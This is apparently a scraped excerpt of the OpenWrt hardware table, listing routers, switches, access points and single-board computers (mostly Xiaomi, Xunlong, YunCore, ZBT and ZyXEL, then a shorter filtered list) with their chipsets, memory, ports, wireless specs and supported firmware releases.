534 | WiFi Router | Xiaomi | Mi Router 4A (MIR4A) | Gigabit Edition | unknown 2022 | 21.02.3 | MediaTek MT7621 | 880 | 2 | 16 | 128 | – | 3 | b/g/n | a/n/ac | MediaTek MT7603E, MediaTek MT7612E | – | – | xiaomi_mi_router_4a_gigabit_edition | https://forum.openwrt.org/t/xiaomi-mi-router-4a-gigabit-edition-r4ag-r4a-gigabit-fully-supported-but-requires-overwriting-spi-flash-with-programmer/36685 | View/Edit data | |||
535 | WiFi Router | Xiaomi | Mi Router AC2100 | Available 2022 | 21.02.1 | MediaTek MT7621A | 880 | 2 | 128NAND | 128 | – | 4 | b/g/n | a/n/ac | MediaTek MT7603, MediaTek MT7615 | – | – | https://www.mi.com/miwifiac | mi_router_ac2100 | View/Edit data | ||||
536 | WiFi Router | Xiaomi | MiWiFi 3G | v2 | unknown 2022 | 21.02.3 | MediaTek MT7621 | 880 | 2 | 16 | 128 | – | 3 | b/g/n | a/n/ac | MediaTek MT7603E, MediaTek MT7612E | – | – | mir3g | https://forum.openwrt.org/t/xiaomi-mi-router-4a-gigabit-edition-r4ag-r4a-gigabit-fully-supported-but-requires-overwriting-spi-flash-with-programmer/36685, https://forum.openwrt.org/t/xiaomi-wifi-router-3g-v2/42584 | View/Edit data | |||
537 | WiFi Router | Xiaomi | MiWiFi R4 | v1 | Available 2022 | 21.02.1 | MediaTek MT7621A | 880 | 2 | 128NAND | 128 | – | 3 | b/g/n | a/n/ac | MediaTek MT7603EN, MediaTek MT7612EN | – | – | https://forum.openwrt.org/t/xiaomi-mi-wifi-r4-exploration/23322 | View/Edit data | ||||
538 | WiFi Router | Xiaomi | Redmi Router AC2100 | Available 2020 | 21.02.3 | MediaTek MT7621 | 880 | 2 | 128NAND | 128 | – | 4 | b/g/n | a/n/ac | 2 spatial stream 11n, 4 spatial stream w/ MIMO on 11ac | MediaTek MT7603, MediaTek MT7615 | – | – | https://www.mi.com/rm2100 | xiaomi_redmi_router_ac2100 | http://forum.openwrt.org/t/new-xiaomi-router-ac2100 | View/Edit data | ||
539 | WiFi Router | Xiaomi | AX3200 | Available 2021 | snapshot | MediaTek MT7622B | 1350 | 2 | 128NAND | 256 | – | 4 | b/g/n | a/n/ac/ax | MU-MIMO, OFDMA, 802.11s | MediaTek MT7622B, MediaTek MT7915E | – | – | https://www.mi.com/global/product/xiaomi-router-ax3200/ | ax3200 | https://forum.openwrt.org/t/adding-openwrt-support-for-xiaomi-redmi-router-ax6s-xiaomi-router-ax3200/111085 | View/Edit data | ||
540 | WiFi Router | Xiaomi | AX6S | unknown 2022 | snapshot | MediaTek MT7622B | 1350 | 2 | 128NAND | 256 | – | 4 | b/g/n | a/n/ac/ax | MU-MIMO, OFDMA, 802.11s | MediaTek MT7622B, MediaTek MT7911AN | – | – | https://www.mi.com/global/product/xiaomi-router-ax3200/ | ax3200 | https://forum.openwrt.org/t/adding-openwrt-support-for-xiaomi-redmi-router-ax6s-xiaomi-router-ax3200/111085 | View/Edit data | ||
541 | WiFi Router | Xiaomi | Mi Router CR6606 | unknown 2022 | snapshot | MediaTek MT7621AT | 880 | 2 | 128NAND | 256 | – | 4 | ¿ | ¿ | MediaTek MT7905DAN, MediaTek MT7975DN | – | – | http://¿ | View/Edit data | |||||
542 | WiFi Router | Xiaomi | Mi Router CR6608 | unknown 2022 | snapshot | MediaTek MT7621AT | 880 | 2 | 128NAND | 256 | – | 4 | ¿ | ¿ | MediaTek MT7905DAN, MediaTek MT7975DN | – | – | http://¿ | View/Edit data | |||||
543 | WiFi Router | Xiaomi | Mi Router CR6609 | unknown 2022 | snapshot | MediaTek MT7621AT | 880 | 2 | 128NAND | 256 | – | 4 | ¿ | ¿ | MediaTek MT7905DAN, MediaTek MT7975DN | – | – | http://¿ | View/Edit data | |||||
544 | Router | XiaoYu | XY-C5 | unknown 2022 | 21.02.3 | MediaTek MT7621A | 880 | 2 | 32 | 512 | – | 5 | – | – | – | – | 1x 3.0 | View/Edit data | ||||||
545 | Single Board Computer | XILINX | ZC702 | Available 2022 | 21.02.3 | Xilinx XC7Z020 | 667 | 2 | 16, SD | 1024 | – | 1 | – | – | – | – | 1x 2.0 | https://www.xilinx.com/products/boards-and-kits/ek-z7-zc702-g.html | View/Edit data | |||||
546 | Single Board Computer | Xunlong | Orange Pi PC Plus | Available 2022 | 21.02.3 | WiFi 2.4GHz | Allwinner H3 | 1200 | 4 | 8192, microSDHC | 1024 | 1 | – | b/g/n | – | Realtek RTL8189FTV | – | 1x OTG, 3x 2.0 | http://www.orangepi.org/orangepipcplus/ | View/Edit data | ||||
547 | Single Board Computer | Xunlong | Orange Pi PC | Available 2022 | 21.02.3 | Allwinner H3 | 1300 | 4 | microSD | 1024 | 1 | – | – | – | – | – | 1x OTG, 3x 2.0 | http://www.orangepi.org/orangepipc/ | View/Edit data | |||||
548 | Single Board Computer | Xunlong | Orange Pi One | Available 2022 | 21.02.3 | Allwinner H3 | 1200 | 4 | microSDHC | 512 | 1 | – | – | – | – | – | 1x 2.0, 1x OTG | http://www.orangepi.org/orangepione/ | View/Edit data | |||||
549 | Single Board Computer | Xunlong | Orange Pi One Plus | Available 2021 | snapshot | Allwinner H6 | 1800 | 4 | microSDHC | 1024 | – | 1 | – | – | – | – | 1x 2.0 | http://www.orangepi.org/OrangePiOneplus/ | View/Edit data | |||||
550 | Single Board Computer | Xunlong | Orange Pi PC2 | Available 2022 | 21.02.3 | Allwinner H5 | 1200 | 4 | 2, microSD | 1024 | – | 1 | – | – | – | – | 1x OTG, 3x 2.0 | http://www.orangepi.org/orangepipc2/ | View/Edit data | |||||
551 | Single Board Computer | Xunlong | Orange Pi Zero | unknown 2022 | 21.02.3 | Allwinner H2 | 1200 | 4 | microSD | 256 | 1 | – | b/g/n | – | Allwinner XR819 | – | 1x 2.0, 1x OTG, 1x µUSB (power) | http://www.orangepi.org/orangepizero/ | orange_pi_zero | View/Edit data | ||||
552 | Single Board Computer | Xunlong | Orange Pi Zero Plus | Available 2022 | 21.02.3 | WiFi 2.4GHz | Allwinner H5 | 1200 | 4 | 2, microSD | 512 | – | 1 | b/g/n | – | Staging driver, but not supported now | Realtek RTL8189FTV | – | 1x 2.0, 1x Header, 1x OTG, 1x µUSB (power) | http://www.orangepi.org/OrangePiZeroPlus/ | View/Edit data | |||
553 | Single Board Computer | Xunlong | Orange Pi R1 | Available 2022 | 21.02.3 | WiFi 2.4GHz | Allwinner H2 | 1200 | 4 | 16, microSD | 256 | 2 | – | b/g/n | – | Staging driver, but not supported now | Realtek RTL8189ETV | – | 1x Header, 1x OTG, 1x µUSB (power) | http://www.orangepi.org/OrangePiR1/ | orange_pi_r1 | View/Edit data | ||
554 | Router | Xunlong | Orange Pi R1 Plus LTS | Available 2022 | external image | Rockchip RK3328 | 1500 | 4 | microSDHC | 1024 | ¿ | 2 | – | – | ¿ | 1x 2.0 | https://www.orangepi.org/Orange Pi R1 Plus LTS/ | orange_pi_r1_plus | View/Edit data | |||||
555 | WiFi Router | YOUKU | YK-L2 | unknown 2022 | 21.02.3 | MediaTek MT7621A | 880 | 2 | 16 | 256 | ¿ | ¿ | b/g/n | a/n/ac | MediaTek MT7603EN, MediaTek MT7612EN | – | 1x 3.0 | View/Edit data | ||||||
556 | WiFi AP | YunCore | XD4200 | unknown 2022 | 21.02.3 | Qualcomm Atheros QCA9563 | 775 | 1 | 16 | 128 | – | 2 | b/g/n | a/n/ac | Qualcomm Atheros QCA9563, Qualcomm Atheros QCA9886 | – | – | http://www.yuncore.com.cn/en/ProductDetail/2226322.html | View/Edit data | |||||
557 | WiFi Router | YunCore | SR3200 | unknown 2022 | 19.07.10 | Qualcomm Atheros QCA9563 | 775 | 1 | 16 | 128 | – | 5 | b/g/n | a/n/ac | Qualcomm Atheros QCA9563, Qualcomm Atheros QCA9882 | – | 2x 2.0 | http://www.yuncore.com.cn/product.php?id=83 | sr3200 | View/Edit data | ||||
558 | WiFi Router | YunCore | T830 | unknown 2022 | 19.07.10 | Qualcomm Atheros QCA9531 | 650 | 1 | 16 | 128 | 5 | – | b/g/n | – | Qualcomm Atheros QCA9531 | – | 1x 2.0 | http://www.yuncore.com.cn/product.php?id=90&language=en_us | View/Edit data | |||||
559 | WiFi AP | YunCore | A770 | Available 2022 | 21.02.3 | Qualcomm Atheros QCA9531 | 650 | 1 | 16 | 128 | 2 | – | b/g/n | a/n/ac | Qualcomm Atheros QCA9531, Qualcomm Atheros QCA9887 | – | – | http://yuncore.com.cn/en/ProductDetail/2226281.html | View/Edit data | |||||
560 | WiFi AP | YunCore | XD3200 | v5.3 | unknown 2022 | 19.07.10 | WLAN LED | Qualcomm Atheros QCA9563 | 750 | 1 | 16 | 128 | – | 2 | b/g/n | a/n/ac | Qualcomm Atheros QCA9882 | – | – | http://www.yuncore.com.cn/product.php?id=94&language=en_us | View/Edit data | |||
561 | WiFi AP | YunCore | A782 | unknown 2022 | 21.02.3 | Qualcomm Atheros QCA9563 | 775 | 1 | 16 | 128 | – | 2 | b/g/n | a/n/ac | Qualcomm Atheros QCA9563, Qualcomm Atheros QCA9886 | – | – | View/Edit data | ||||||
562 | WiFi Router | ZBT | WE826-E | unknown 2022 | 21.02.3 | MediaTek MT7620A | 580 | 1 | 32 | 128 | 5 | – | b/g/n | – | MediaTek MT7620A | ¿ | 1x 2.0 | View/Edit data | ||||||
563 | WiFi Router | ZBT | WE826 | B0 16M | Available 2022 | 21.02.3 | MediaTek MT7620A | 580 | 1 | 16, SD | 128 | 5 | – | b/g/n | a/n/ac | MediaTek MT7612EN, MediaTek MT7620A | – | 1x 2.0 | we-826 | https://forum.openwrt.org/viewtopic.php?id=62347 | View/Edit data | |||
564 | WiFi Router | ZBT | WE826 | B0 32M | Available 2021 | 21.02.3 | MediaTek MT7620A | 580 | 1 | 32 | 128 | 5 | – | b/g/n | a/n/ac | MediaTek MT7620A | – | 1x 2.0 | we-826 | https://forum.openwrt.org/viewtopic.php?id=62347 | View/Edit data | |||
565 | WiFi Router | ZBT | WE826 | T 16M | Available 2022 | 21.02.3 | MediaTek MT7620A | 580 | 1 | 16, SD | 128 | 5 | – | b/g/n | – | MediaTek MT7612EN, MediaTek MT7620A | – | 1x 2.0 | we-826 | https://forum.openwrt.org/viewtopic.php?id=62347 | View/Edit data | |||
566 | WiFi Router | ZBT | WE826 | T 32M | Available 2021 | 21.02.3 | MediaTek MT7620A | 580 | 1 | 32 | 128 | 5 | – | b/g/n | – | MediaTek MT7620A | – | 1x 2.0 | we-826 | https://forum.openwrt.org/viewtopic.php?id=62347 | View/Edit data | |||
567 | WiFi AP | ZBT | WE1026-H | Available 2022 | 21.02.3 | MediaTek MT7620A | 580 | 1 | 16, 32, microSD | 128 | 2 | – | ¿ | – | ¿ | – | 1x 2.0 | View/Edit data | ||||||
568 | WiFi Router | ZBT | WE1326 | Available 2022 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 16 | 512 | – | 5 | b/g/n | a/n/ac | MediaTek MT7603EN, MediaTek MT7612EN | – | 1x 2.0 | http://www.zbt-china.com/products/router/213.html | View/Edit data | |||||
569 | WiFi Router | ZBT | WE1526 | Available 2022 | 18.06.9 | Qualcomm Atheros QCA9531 | 650 | 1 | 16 | 128 | 5 | – | b/g/n | – | ¿ | – | 1x 2.0 | http://www.zbtlink.com/products/router/Indoorrouter/71.html | View/Edit data | |||||
570 | WiFi AP | ZBT | WE3526 | Available 2022 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 16 | 512 | – | 5 | b/g/n | a/n/ac | MediaTek MT7603E, MediaTek MT7612E | – | 1x 2.0 | http://www.zbtlink.com/products/313.html | zbt_we3526 | View/Edit data | ||||
571 | WiFi Router | ZBT | WG2626 | v03 | Available 2022 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 16 | 512 | – | 5 | b/g/n | a/n/ac | MediaTek MT7602E, MediaTek MT7612E | – | 1x 3.0 | http://www.zbt-china.com/En/list.aspx?cp_id=502 | wg2626 | https://forum.openwrt.org/viewtopic.php?id=62368 | View/Edit data | ||
572 | WiFi Router | ZBT | WG3526 | 16M | Available 2020 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 16 | 512 | – | 5 | b/g/n | a/n/ac | MediaTek MT7603E, MediaTek MT7612E | – | 1x 3.0 | https://www.zbtlink.com/sale-12589308-1200mbps-wireless-router-3g-4g-wifi-router-zbt-factory-direct-sell-wg3526.html | zbt_wg3526 | https://forum.openwrt.org/viewtopic.php?id=63996 | View/Edit data | ||
573 | WiFi Router | ZBT | WG3526 | 32M | Available 2022 | 21.02.3 | MediaTek MT7621A | 880 | 2 | 32 | 512 | – | 5 | b/g/n | a/n/ac | MediaTek MT7603E, MediaTek MT7612E | – | 1x 3.0 | http://www.zbtlink.com/products/router/134.html | zbt_wg3526 | https://forum.openwrt.org/viewtopic.php?id=63996 | View/Edit data | ||
574 | WiFi Router | ZBT | ZBT-WD323 | Available 2022 | 21.02.3 | Atheros AR9344 | 560 | 1 | 16 | 128 | 3 | – | b/g/n | – | Atheros AR9340 | LTE | 1x 2.0 | View/Edit data | ||||||
575 | WiFi Router | ZBT | ZBT-WG1608 | 16M | unknown 2022 | snapshot | MediaTek MT7621A | 880 | 2 | 16, microSDXC | 256 | – | 5 | b/g/n | a/n/ac | MediaTek MT7603E, MediaTek MT7613BE | LTE | 1x 3.0 | http://¿ | View/Edit data | ||||
576 | WiFi Router | ZIO | FREEZIO | unknown 2022 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 16 | 128 | – | 5 | b/g/n | a/n/ac | MediaTek MT7603EN, MediaTek MT7612EN | – | 1x 3.0 | http://www.zio.co.kr/home/m_view.php?ps_db=pr&ps_boid=61&ps_mode= | View/Edit data | |||||
577 | WiFi Router | ZTE | MF286D | unknown 2021 | snapshot | voip | Qualcomm IPQ4019 | 715 | 4 | 128NAND | 256 | – | 4 | b/g/n | a/n/ac | Qualcomm Atheros QCA4019 | LTE | 1x 2.0 | http://¿ | mf286d | View/Edit data | |||
578 | WiFi Router | ZyXEL | Keenetic Extra II | unknown 2022 | 21.02.3 | MediaTek MT7628NN | 580 | 1 | 32 | 128 | 5 | – | b/g/n | a/n/ac | MediaTek MT7612EN, MediaTek MT7628N | – | 1x 2.0 | https://keenetic.com/ru/zyxel-keenetic-extra-2 | View/Edit data | |||||
579 | WiFi Router | ZyXEL | EMG2926-Q10A | 1.00, A02, A03 | Available 2022 | 21.02.3 | Qualcomm Atheros QCA9558 | 720 | 1 | 128NAND, 16 | 256 | – | 5 | b/g/n | a/n/ac | Qualcomm Atheros QCA9558, Qualcomm Atheros QCA9880v2 | – | 2x 2.0 | nbg6716 | https://forum.archive.openwrt.org/viewtopic.php?id=68668, https://forum.openwrt.org/t/difficulty-to-upgrade-zyxel-emg2926-q10a/50040/19, https://forum.openwrt.org/viewtopic.php?id=60141 | View/Edit data | |||
580 | Switch | ZyXEL | GS1900-8 | Available 2021 | 21.02.3 | Realtek RTL8380M | 500 | 1 | 16 | 128 | – | 8 | – | – | – | – | https://www.zyxel.com/us/en/products_services/8-10-16-24-48-port-GbE-Smart-Managed-Switch-GS1900-Series/ | gs1900-8 | https://forum.openwrt.org/t/support-for-rtl838x-based-managed-switches/57875 | View/Edit data | ||||
581 | Switch | ZyXEL | GS1900-8HP | v2 | unknown 2021 | 21.02.3 | Realtek RTL8380M | 500 | 1 | 16 | 128 | – | 8 | – | – | – | – | – | https://www.zyxel.com/de/de/products_services/8-10-16-24-48-port-GbE-Smart-Managed-Switch-GS1900-Series/ | gs1900-8hp_v1 | View/Edit data | |||
582 | Switch | ZyXEL | GS1900-10HP | v1 | Available 2020 | 21.02.3 | Realtek RTL8380M | 500 | 1 | 16 | 128 | – | 8 | – | – | – | – | – | https://www.zyxel.com/nl/nl/products_services/8-10-16-24-48-port-GbE-Smart-Managed-Switch-GS1900-Series/ | gs1900-10hp | https://forum.openwrt.org/t/support-for-rtl838x-based-managed-switches/57875/ | View/Edit data | ||
583 | WiFi Router | ZyXEL | NBG6617 | Available 2022 | 21.02.3 | Qualcomm Atheros IPQ4018 | 716 | 4 | 32 | 256 | – | 5 | b/g/n | a/n/ac | wave2/MIMO | Qualcomm Atheros IPQ4018 | – | 1x 3.0 | https://www.zyxel.com/products_services/nbg6617.shtml | nbg6617 | View/Edit data | |||
584 | Router | ZyXEL | NR7101 | Available 2021 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 128NAND | 256 | – | 1 | b/g/n | – | WiFi is meant for management only | MediaTek MT7603 | LTE | – | https://www.zyxel.com/products_services/5G-New-Radio-Outdoor-Router-NR7101/ | nr7101 | View/Edit data | |||
585 | Range Extender | ZyXEL | WRE6606 | unknown 2022 | 21.02.3 | Qualcomm Atheros IPQ4018 | 638 | 4 | 16 | 128 | – | 1 | b/g/n | a/n/ac | Qualcomm Atheros IPQ4018 | – | ¿ | View/Edit data | ||||||
586 | Switch | ZyXEL | XGS1250-12 | Available 2021 | snapshot | SFP | RTL9302B | 800 | ¿ | 16 | 128 | – | 8 | – | – | – | – | – | https://www.zyxel.com/products_services/12-Port-Web-Managed-Multi-Gigabit-Switch-includes-3-Port-10G-and-1-Port-10G-SFP–XGS1250-12/ | xgs1250-12 | View/Edit data | |||
587 | Switch | ZyXEL | GS1900-24HP | v2 | Available 2022 | snapshot | Realtek RTL8382M | 500 | 1 | 16 | 128 | – | 24 | – | – | – | – | https://www.zyxel.com/us/en/products_services/8-10-16-24-48-port-GbE-Smart-Managed-Switch-GS1900-Series/ | View/Edit data | |||||
588 | Switch | ZyXEL | GS1900-16 | Available 2022 | snapshot | Realtek RTL8382M | 500 | 1 | 16 | 128 | – | 16 | – | – | – | – | https://www.zyxel.com/us/en/products_services/8-10-16-24-48-port-GbE-Smart-Managed-Switch-GS1900-Series/ | View/Edit data | ||||||
589 | Switch | ZyXEL | GS1900-48 | Available 2022 | snapshot | Realtek RTL8393M | 700 | 1 | 16 | 128 | – | 48 | – | – | – | – | https://www.zyxel.com/us/en/products_services/8-10-16-24-48-port-GbE-Smart-Managed-Switch-GS1900-Series/ | View/Edit data |
§
In order to list devices you’ll have the best experience with, here we filter for devices that…
Special notes:
Show Filter: Availability
Show Filter: Device Type
Show Filter: Modem
Show Filter: Current Supported Release
# | Device Type | Brand | Model | Versions | Availability | Supported Current Rel | Unsupported Functions | CPU | CPU MHz | CPU cores | Flash MB | RAM MB | 100M ports | Gbit ports | WLAN 2.4GHz | WLAN 5.0GHz | WLAN Comments | WLAN Hardware | Modem | USB ports | ↓OEM Device Homepage | Device Page | OpenWrt Forum Topic URL | Device Techdata |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1 | WiFi Router | JCG | JHR-AC876M | unknown 2022 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 16 | 256 | – | 5 | b/g/n | a/n/ac | MediaTek MT7615N | – | 1x 2.0, 1x 3.0 | jhr-ac876m | View/Edit data | |||||
2 | Single Board Computer | Marvell | DB-88F8040-Modular | unknown 2022 | 21.02.3 | Marvell Armada 88F8040 | 2000 | 4 | 256, SD | ¿ | – | 2 | – | – | – | – | 2x 3.0 | View/Edit data | ||||||
3 | Single Board Computer | Marvell | RD-A370-A1 | unknown 2022 | 21.02.3 | Marvell Armada 370 | 1200 | 1 | 1024NAND | 512 | – | 5 | ¿ | ¿ | 2x mini-PCIe | ¿ | 2x 2.0 | View/Edit data | ||||||
4 | WiFi Router | Sercomm | H500-s vfes | v1 | Available 2022 | 21.02.3 | DSL modem, FXS, WiFi 2.4GHz | Broadcom BCM63167 | 400 | 2 | 128NAND | 128 | – | 4 | b/g/n | a/n/ac | Broadcom BCM435f, Quantenna QT3740BC | xDSL | 1x 2.0 | h500-s | View/Edit data | |||
5 | WiFi Router | NETGEAR | DGND3800B | Available 2022 | 21.02.3 | DSL modem, WiFi 2.4GHz partly | Broadcom BCM6368 | 400 | 2 | 128, 128NAND, 32 | 128 | – | 5 | b/g/n | a/n | Broadcom BCM43222 | xDSL | 2x 2.0 | dgnd3700 | https://forum.openwrt.org/viewtopic.php?id=36824 | View/Edit data | |||
6 | WiFi Router | AVM | FRITZ!Box 3490 | unknown 2021 | PR pending | Lantiq XWAY VRX288 / PSB 80920 EL | 500 | 2 | 512NAND, 8 | 256 | – | 4 | b/g/n | a/n/ac | Qualcomm Atheros QCA9558, Qualcomm Atheros QCA9880 | VDSL2 | 2x 3.0 | https://forum.openwrt.org/t/port-to-avm-fritz-box-3490/52692 | View/Edit data | |||||
7 | NAS | Cloud Engines | Pogoplug V2 | POGO-E02 | unknown 2022 | 21.02.3 | Marvell 88F6281 | 1200 | 1 | 128 | 256 | – | 1 | – | – | – | – | 4x 2.0 | pogoplug | View/Edit data | ||||
8 | Single Board Computer | Marvell | DB-A380-DDR3-AP | unknown 2022 | 17.01.4 | Marvell Armada 38x | 1600 | 2 | 1024NAND | 2048 | – | 3 | ¿ | ¿ | 3x mini-PCIe | ¿ | 1x 2.0, 1x 3.0 | View/Edit data | ||||||
9 | WiFi Router | Buffalo | WXR-2533DHP | unknown 2022 | 21.02.3 | Qualcomm Atheros IPQ8064 | 1400 | 2 | 256 | 512 | – | 5 | b/g/n | a/n/ac | Qualcomm Atheros QCA9880 | – | 2x 3.0 | View/Edit data | ||||||
10 | Single Board Computer | Marvell | DB-88F7040-Modular | unknown 2022 | 21.02.3 | Marvell Armada 88F7040 | 1400 | 4 | 128, SD | ¿ | – | 2 | – | – | – | – | 2x 3.0 | View/Edit data | ||||||
11 | WiFi Router | Arcadyan / Astoria | ARV7519RW22 (Livebox 2.1) | unknown 2022 | 19.07.10 | WiFi 2.4GHz | Lantiq XWAY VRX288 | 500 | 2 | 32 | 128 | 4 | 1 | b/g/n | – | 2×2 MIMO | Lantiq XWAY WAVE300 | ADSL2 Annex A | 2x 2.0 | arv7519rw22 | View/Edit data | |||
12 | WiFi AP | ALFA Network | AP120C-AC | Available 2022 | 21.02.3 | Qualcomm Atheros IPQ4018 | 717 | 4 | 128NAND, 16 | 256 | – | 2 | b/g/n | a/n/ac | Qualcomm Atheros IPQ4018 | – | – | View/Edit data | ||||||
13 | WiFi Router | BT | Home Hub 5 | Type A | unknown 2022 | 21.02.3 | Lantiq XWAY VRX268 | 500 | 2 | 128NAND | 128 | – | 5 | b/g/n | a/n/ac | Atheros AR9287, Qualcomm Atheros QCA9880 | VDSL2 | 1x 2.0 | homehub_v5a | View/Edit data | ||||
14 | WiFi Router | Buffalo | WXR-1900DHP | unknown 2022 | 21.02.3 | WiFi 2.4GHz partly, WiFi 5GHz | Broadcom BCM4709A0 | 1000 | 2 | 128 | 512 | – | 5 | b/g/n | a/n/ac | Broadcom BCM4360 | – | 1x 2.0, 1x 3.0 | View/Edit data | |||||
15 | WiFi Router | Buffalo | WZR-900DHP | unknown 2022 | 21.02.3 | WiFi 2.4GHz partly, WiFi 5GHz | Broadcom BCM47081A0 | 800 | 1 | 128 | 256 | – | 5 | b/g/n | a | Broadcom BCM4331 | – | 1x 3.0 | https://forum.openwrt.org/viewtopic.php?id=54456 | View/Edit data | ||||
16 | unknown | D-Team | PandoraBox | M1 | unknown 2022 | 21.02.3 | MediaTek MT7621 | ¿ | ¿ | ¿ | ¿ | ¿ | ¿ | ¿ | ¿ | ¿ | ¿ | ¿ | View/Edit data | |||||
17 | WiFi Router | GeHua | GHL-R-001 | unknown 2022 | 19.07.0 | MediaTek MT7621AT | 880 | 2 | 32 | 512 | – | 4 | ¿ | ¿ | MediaTek MT7603EN, MediaTek MT7612EN | – | 1x 3.0 | View/Edit data | ||||||
18 | Single Board Computer | Globalscale | Mirabox | unknown 2022 | 21.02.3 | Marvell Armada 370 88F6707 | 1200 | 1 | 1024 eMMC | 1024 | – | 3 | b/g/n | – | Marvell 88W8787 | – | 2x 3.0 | View/Edit data | ||||||
19 | other | Hi-Link | HLK-7628N | Available 2022 | 21.02.3 | MediaTek MT7628NN | 580 | 1 | 32 | 128 | 5 | – | b/g/n | – | MediaTek MT7628NN | – | – | View/Edit data | ||||||
20 | WiFi Router | HiWiFi/Gee | HC5761A | unknown 2022 | 21.02.3 | SD card | MediaTek MT7628AN | 580 | 1 | 16, SD | 128 | 3 | – | b/g/n | a/n/ac | MediaTek MT7610EN, MediaTek MT7628AN | – | – | View/Edit data | |||||
21 | WiFi Router | HiWiFi/Gee | HC5861B | unknown 2022 | 21.02.3 | MediaTek MT7628AN | 580 | 1 | 16 | 128 | 5 | – | b/g/n | a/n/ac | MediaTek MT7612EN, MediaTek MT7628AN | – | ¿ | View/Edit data | ||||||
22 | Single Board Computer | Marvell | Armada A385 DB AP | unknown 2022 | 21.02.3 | Marvell Armada 385 88F6820 | ¿ | 2 | 1024NAND | ¿ | ¿ | ¿ | ¿ | ¿ | ¿ | ¿ | ¿ | View/Edit data | ||||||
23 | Single Board Computer | Raspberry Pi Foundation | Raspberry Pi | B | Available 2022 | 21.02.3 | Broadcom BCM2835 | 700 | 1 | SD | 512 | 1 | – | – | – | – | – | 2x 2.0 | raspberry_pi | View/Edit data | ||||
24 | unknown | ROSINSON | WR818 | unknown 2022 | 21.02.3 | Qualcomm Atheros QCA9563 | ¿ | 1 | 16 | ¿ | ¿ | ¿ | b/g/n | – | Qualcomm Atheros QCA9563 | ¿ | 2x 2.0 | View/Edit data | ||||||
25 | WiFi Router | Sercomm | H500-s lowi | v1 | Available 2022 | 21.02.3 | DSL modem, WiFi 2.4GHz | Broadcom BCM63167 | 400 | 2 | 128NAND | 128 | – | 4 | b/g/n | a/n/ac | Broadcom BCM435f; Quantenna QT3740BC | xDSL | 1x 2.0 | h500-s | View/Edit data | |||
26 | WiFi Router | Sky | SR102 | unknown 2022 | 21.02.3 | DSL modem, WiFi 2.4GHz | Broadcom BCM63168 | 400 | 2 | 16 | 128 | 4 | – | b/g/n | – | Broadcom BCM435F | ADSL2 | – | sr102 | View/Edit data | ||||
27 | WiFi Router | TP-Link | TL-WR941N | v6 (CN) | unknown 2022 | 18.06.9 | Atheros AR9344 | ¿ | 1 | ¿ | ¿ | ¿ | ¿ | b/g/n | – | Atheros AR9381 | ¿ | ¿ | View/Edit data | |||||
28 | WiFi Router | TP-Link | VR200 | Available 2022 | 21.02.3 | DECT, Wifi 2.4GHz | Lantiq XWAY VRX288 | 500 | 2 | 16 | 128 | – | 4 | b/g/n | a/n/ac | Lantiq XWAY WAVE300, MediaTek MT7610EN | VDSL2 | 2x 2.0 | vr200v | View/Edit data | ||||
29 | WiFi Router | Xiaomi | Mi Router 4A (MIR4A) | Gigabit Edition | unknown 2022 | 21.02.3 | MediaTek MT7621 | 880 | 2 | 16 | 128 | – | 3 | b/g/n | a/n/ac | MediaTek MT7603E, MediaTek MT7612E | – | – | xiaomi_mi_router_4a_gigabit_edition | https://forum.openwrt.org/t/xiaomi-mi-router-4a-gigabit-edition-r4ag-r4a-gigabit-fully-supported-but-requires-overwriting-spi-flash-with-programmer/36685 | View/Edit data | |||
30 | WiFi Router | Xiaomi | MiWiFi 3G | v2 | unknown 2022 | 21.02.3 | MediaTek MT7621 | 880 | 2 | 16 | 128 | – | 3 | b/g/n | a/n/ac | MediaTek MT7603E, MediaTek MT7612E | – | – | mir3g | https://forum.openwrt.org/t/xiaomi-mi-router-4a-gigabit-edition-r4ag-r4a-gigabit-fully-supported-but-requires-overwriting-spi-flash-with-programmer/36685, https://forum.openwrt.org/t/xiaomi-wifi-router-3g-v2/42584 | View/Edit data | |||
31 | WiFi Router | Xiaomi | MiWiFi R4 | v1 | Available 2022 | 21.02.1 | MediaTek MT7621A | 880 | 2 | 128NAND | 128 | – | 3 | b/g/n | a/n/ac | MediaTek MT7603EN, MediaTek MT7612EN | – | – | https://forum.openwrt.org/t/xiaomi-mi-wifi-r4-exploration/23322 | View/Edit data | ||||
32 | WiFi Router | YOUKU | YK-L2 | unknown 2022 | 21.02.3 | MediaTek MT7621A | 880 | 2 | 16 | 256 | ¿ | ¿ | b/g/n | a/n/ac | MediaTek MT7603EN, MediaTek MT7612EN | – | 1x 3.0 | View/Edit data | ||||||
33 | WiFi Router | ZBT | WE826-E | unknown 2022 | 21.02.3 | MediaTek MT7620A | 580 | 1 | 32 | 128 | 5 | – | b/g/n | – | MediaTek MT7620A | ¿ | 1x 2.0 | View/Edit data | ||||||
34 | WiFi Router | ZBT | WE826 | B0 16M | Available 2022 | 21.02.3 | MediaTek MT7620A | 580 | 1 | 16, SD | 128 | 5 | – | b/g/n | a/n/ac | MediaTek MT7612EN, MediaTek MT7620A | – | 1x 2.0 | we-826 | https://forum.openwrt.org/viewtopic.php?id=62347 | View/Edit data | |||
35 | WiFi Router | ZBT | WE826 | B0 32M | Available 2021 | 21.02.3 | MediaTek MT7620A | 580 | 1 | 32 | 128 | 5 | – | b/g/n | a/n/ac | MediaTek MT7620A | – | 1x 2.0 | we-826 | https://forum.openwrt.org/viewtopic.php?id=62347 | View/Edit data | |||
36 | WiFi Router | ZBT | WE826 | T 16M | Available 2022 | 21.02.3 | MediaTek MT7620A | 580 | 1 | 16, SD | 128 | 5 | – | b/g/n | – | MediaTek MT7612EN, MediaTek MT7620A | – | 1x 2.0 | we-826 | https://forum.openwrt.org/viewtopic.php?id=62347 | View/Edit data | |||
37 | WiFi Router | ZBT | WE826 | T 32M | Available 2021 | 21.02.3 | MediaTek MT7620A | 580 | 1 | 32 | 128 | 5 | – | b/g/n | – | MediaTek MT7620A | – | 1x 2.0 | we-826 | https://forum.openwrt.org/viewtopic.php?id=62347 | View/Edit data | |||
